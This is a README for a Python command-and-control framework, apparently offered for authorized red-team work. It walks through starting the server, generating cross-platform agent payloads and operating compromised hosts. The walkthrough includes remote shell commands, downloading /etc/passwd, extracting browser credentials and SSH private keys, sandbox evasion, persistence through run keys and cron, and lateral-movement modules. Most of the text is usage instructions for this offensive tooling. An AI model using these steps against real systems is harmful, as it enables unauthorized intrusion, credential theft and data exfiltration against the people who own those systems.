Reiatsu Node is a full-featured Command & Control framework built in Python. It is designed to provide security professionals and researchers with a robust platform to simulate and study the entire post-exploitation lifecycle of modern adversary operations. Its modular architecture and focus on secure, encrypted communications make it a powerful tool for authorized red team engagements and advanced security education.
- Encrypted Communications - AES-256-GCM + SSL/TLS dual-layer encryption
- Cross-Platform Agents - Deploy on Windows, Linux, and macOS
- Remote Shell Execution - Execute commands on compromised hosts
- Interactive PTY Shell - Full terminal access (Linux/macOS)
- Modular Post-Exploitation - 8 built-in modules
- Session Management - Track and manage multiple agents
- Beacon Architecture - Configurable check-in intervals
- Python 3.8+
- cryptography library
# Clone the repository
git clone https://github.com/ryuk27/reiatsu-node.git
cd reiatsu-node
# Install dependencies
pip install cryptography
# Optional: For screenshot module
pip install Pillow pyscreenshot
# Start the C2 server
python reiatsu.py --host 0.0.0.0 --port 8443
# Generate payload (in separate terminal)
python payload_generator.py -t lin -o agent.py# Basic usage
python reiatsu.py --host 0.0.0.0 --port 8443
# Listen on all interfaces (requires sudo for port 443)
sudo python reiatsu.py --host 0.0.0.0 --port 443# Linux/macOS payload
python payload_generator.py -t lin -o linux_agent.py
# Windows payload
python payload_generator.py -t win -o windows_agent.pyw| Command | Shortcut | Description |
|---|---|---|
sessions |
s |
List all connected agents |
info <id> |
- | Show agent details |
shell <id> <cmd> |
- | Execute shell command |
results <id> |
r <id> |
View command output |
modules |
m |
List available modules |
module <id> <name> [args] |
- | Run module on agent |
interactive_shell <id> |
is <id> |
Start PTY shell (Linux) |
kill <id> |
- | Terminate agent |
clear |
- | Clear terminal |
help |
? |
Show help |
exit |
quit |
Exit server |
reiatsu> sessions
ID IP Status Last Seen
--------------------------------------------------------------------------------
a1b2c3d4-e5f6-7890-abcd-ef1234567890 192.168.1.100 ONLINE 2024-01-15 10:30:00
reiatsu> shell a1b2c3d4-e5f6-7890-abcd-ef1234567890 whoami
[+] Queued Shell: whoami for agent a1b2c3d4...
reiatsu> results a1b2c3d4-e5f6-7890-abcd-ef1234567890
--- Result 1 ---
Type: shell
Output:
root
reiatsu> module a1b2c3d4-e5f6-7890-abcd-ef1234567890 sysinfo
[+] Queued Module: sysinfo for agent a1b2c3d4...
reiatsu> module a1b2c3d4-e5f6-7890-abcd-ef1234567890 fileops list /etc
[+] Queued Module: fileops for agent a1b2c3d4...
| Module | Description | Usage |
|---|---|---|
sysinfo |
Comprehensive system reconnaissance | module <id> sysinfo |
fileops |
File operations (download, list, search) | module <id> fileops <action> <path> |
screenshot |
Capture desktop screenshot | module <id> screenshot |
creds |
Extract browser credentials and SSH keys | module <id> creds |
evasion |
Sandbox/VM detection | module <id> evasion |
lateral |
Network reconnaissance | module <id> lateral |
persistence |
Persistence technique examples | module <id> persistence |
lolbins |
Living-off-the-land commands | module <id> lolbins |
Gathers comprehensive system information including:
- Basic system info (OS, architecture, hostname)
- User information (username, privileges, home directory)
- Network configuration (IPs, interfaces, gateway)
- Disk information
- Running processes and security products
- Environment variables
reiatsu> module <agent_id> sysinfo
Perform file operations on target system:
# List directory contents
reiatsu> module <agent_id> fileops list /etc
# Download file (base64 encoded)
reiatsu> module <agent_id> fileops download /etc/passwd
# Search for files
reiatsu> module <agent_id> fileops search /home *.txt
# View text file contents
reiatsu> module <agent_id> fileops cat /var/log/syslog
# Show current directory
reiatsu> module <agent_id> fileops pwdCapture target desktop screenshot:
- Windows: Uses PIL, mss, or PowerShell
- Linux: Uses pyscreenshot, scrot, or ImageMagick
- macOS: Uses screencapture
reiatsu> module <agent_id> screenshot
Output is base64 encoded PNG. Decode with:
echo '<base64_data>' | base64 -d > screenshot.png- Windows: Browser credentials (Chrome, Edge)
- Linux: SSH private keys
- Sandbox/VM detection
- Obfuscation examples
- ARP table analysis
- Movement technique examples
- Windows: Registry run keys
- Linux: Cron jobs
- Native binary abuse techniques
reiatsu-node/
├── reiatsu.py # Main C2 server entry point
├── payload_generator.py # Agent payload generator
├── core/
│ ├── c2_server.py # C2 server implementation
│ └── agent_template.py # Agent template
├── modules/
│ ├── sysinfo.py # System information (NEW)
│ ├── fileops.py # File operations (NEW)
│ ├── screenshot.py # Screenshot capture (NEW)
│ ├── creds.py # Credential harvesting
│ ├── evasion.py # Defense evasion
│ ├── lateral.py # Lateral movement
│ ├── persistence.py # Persistence techniques
│ └── lolbins.py # LOLBins techniques
└── payloads/ # Generated payloads
The server automatically generates:
cert.pem/key.pem- SSL certificatesreiatsu.key- AES encryption keyserver_state.json- Server config for payload generation
- AES-256-GCM - Authenticated encryption for all C2 traffic
- SSL/TLS - Transport layer encryption
- Unique Agent IDs - Based on system characteristics
- Session Timeout - Automatic offline detection
Users are responsible for ensuring they have proper authorization before using this tool. Unauthorized use may violate laws in your jurisdiction.